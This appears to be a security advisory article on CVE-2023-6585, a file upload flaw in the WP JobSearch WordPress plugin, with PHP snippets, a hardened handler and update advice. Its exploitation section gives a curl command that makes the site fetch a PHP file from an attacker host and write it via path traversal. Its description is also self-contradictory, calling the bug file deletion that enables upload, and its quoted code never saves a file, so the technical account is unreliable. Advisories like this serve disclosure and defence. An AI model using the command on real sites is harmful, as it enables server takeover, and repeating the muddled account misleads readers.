WordPress is one of the most popular content management systems (CMS), widely used to create websites, blogs, and web applications. The base platform can be extended with a plethora of plugins that add extra functionality to a site. However, plugins can also introduce new security vulnerabilities and threats to the website. In this article, we discuss CVE-2023-6585, a vulnerability in the WP JobSearch plugin for WordPress that allows unauthenticated attackers to upload arbitrary files to the server.

Description of Vulnerability

Versions of the WP JobSearch WordPress plugin before 2.3.4 are vulnerable to unlink() arbitrary file deletion, which can enable an attacker to upload arbitrary files to the target server without authentication. This can lead to a full compromise of the application, since any file type, including PHP, can be uploaded. The root cause is that the plugin does not validate the files being uploaded.

Code Snippet

The vulnerable code is in the file jobsearch_plugin.php, where the save() and file_uploader() functions do not validate the files being uploaded.

function file_uploader() {
    // All three values are taken straight from the POST body; there is no
    // authentication or nonce check and no validation of name, type or path.
    $img_url = isset($_POST['img_url']) ? $_POST['img_url'] : '';
    $upload_to = isset($_POST['upload_to']) ? $_POST['upload_to'] : 'temp';
    $img_name = isset($_POST['img_name']) ? $_POST['img_name'] : '';
    $jobsearch_upload_dir = wp_upload_dir();
    $copy_rand_dir = $jobsearch_upload_dir['subdir'] . '/temp';
    $copy_rand_dir_base = $jobsearch_upload_dir['basedir'] . '/temp';
}
function save() {
    // Same pattern: file name, destination sub-path and source URL are
    // attacker-controlled and used without validation.
    $file_name = isset($_POST['file_name']) ? $_POST['file_name'] : '';
    $store_path = isset($_POST['store_path']) ? $_POST['store_path'] : 'temp';
    $file_url = isset($_POST['file_url']) ? $_POST['file_url'] : '';
    $jobsearch_upload_dir = wp_upload_dir();
    // The unsanitised store_path is appended directly to the uploads directory.
    $store_path = $jobsearch_upload_dir['subdir'] . '/' . $store_path;
}

As the snippet shows, neither the file name, its type, nor the destination path is validated before the file is saved, which allows attackers to upload arbitrary files without authentication.
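For contrast, the following is an added example (written for this article, not code from WP JobSearch or its patched release) of a handler in the shape of file_uploader() that performs the checks the vulnerable version lacks: authentication, a nonce, an extension and content allow-list, file-name sanitisation, and containment of the destination inside uploads/temp. The 'jobsearch_upload' nonce action, the 'upload' form field and the allowed-type list are assumptions.

```php
<?php
// Added example of a hardened upload handler. Assumed names: the
// 'jobsearch_upload' nonce action, the 'upload' multipart field and the
// allow-list below. Everything else is stock WordPress/PHP API.
function hardened_file_uploader() {
    // 1. Require a logged-in user with upload rights and a valid nonce;
    //    the vulnerable handler had neither check.
    if ( ! is_user_logged_in() || ! current_user_can( 'upload_files' ) ) {
        wp_send_json_error( 'not allowed', 403 );
    }
    check_ajax_referer( 'jobsearch_upload', 'nonce' );

    // 2. Accept only a real multipart upload, never a URL to fetch server-side.
    if ( empty( $_FILES['upload']['tmp_name'] )
        || ! is_uploaded_file( $_FILES['upload']['tmp_name'] ) ) {
        wp_send_json_error( 'no file', 400 );
    }

    // 3. Allow-list extensions and verify content where WordPress can
    //    (images are sniffed); PHP and other executables are never listed.
    $allowed = array( 'pdf' => 'application/pdf', 'png' => 'image/png', 'jpg|jpeg' => 'image/jpeg' );
    $name    = sanitize_file_name( wp_basename( wp_unslash( $_FILES['upload']['name'] ) ) );
    $check   = wp_check_filetype_and_ext( $_FILES['upload']['tmp_name'], $name, $allowed );
    if ( empty( $check['ext'] ) || empty( $check['type'] ) ) {
        wp_send_json_error( 'file type not allowed', 415 );
    }

    // 4. Confine the destination to uploads/temp. sanitize_file_name() strips
    //    path separators and dot runs, and the realpath comparison is a second
    //    guard against traversal such as "./../../".
    $base_dir   = wp_normalize_path( wp_upload_dir()['basedir'] . '/temp' );
    $sub        = isset( $_POST['upload_to'] ) ? sanitize_file_name( wp_unslash( $_POST['upload_to'] ) ) : '';
    $target_dir = ( '' === $sub ) ? $base_dir : $base_dir . '/' . $sub;
    wp_mkdir_p( $target_dir );
    $real_base   = realpath( $base_dir );
    $real_target = realpath( $target_dir );
    if ( false === $real_base || false === $real_target
        || 0 !== strpos( $real_target . '/', $real_base . '/' ) ) {
        wp_send_json_error( 'invalid destination', 400 );
    }

    // 5. Store under a unique, sanitised name and report only that name.
    $dest = $real_target . '/' . wp_unique_filename( $real_target, $name );
    if ( ! move_uploaded_file( $_FILES['upload']['tmp_name'], $dest ) ) {
        wp_send_json_error( 'could not save file', 500 );
    }
    wp_send_json_success( array( 'file' => basename( $dest ) ) );
}
```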

Exploitation Details

First, the attacker sends a POST request to the upload handler at website-url/wp-content/plugins/wp-jobsearch/jobsearch_plugin.php with the following parameters:

upload_to = Directory where the file needs to be uploaded

This can be done with any HTTP client, including browser developer tools, Python, or a command-line utility such as curl.

curl --location --request POST 'http://wordpress-site.com/wp-content/plugins/wp-jobsearch/jobsearch_plugin.php' \
    --form 'img_url=https://attacker-site.com/malicious.php' \
    --form 'img_name=malicious.php' \
    --form 'upload_to=./../../'

Once the file is uploaded, the attacker has full control over the server, enabling further exploitation, including data manipulation, theft of sensitive information, or even taking down the entire server.

Mitigation

To protect your WordPress installation from CVE-2023-6585, update the WP JobSearch plugin to version 2.3.4 or later, which addresses the vulnerability. In addition, keep your plugins, themes, and WordPress core updated to the latest versions to minimize exposure to similar issues.

References

Original Source: https://wpvulndb.com/vulnerabilities/10148
CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6585
WordPress Plugin Repository: https://wordpress.org/plugins/jobsearch-wp-job-board/

Timeline

Published on: 02/27/2024 09:15:37 UTC
Last modified on: 02/27/2024 14:20:06 UTC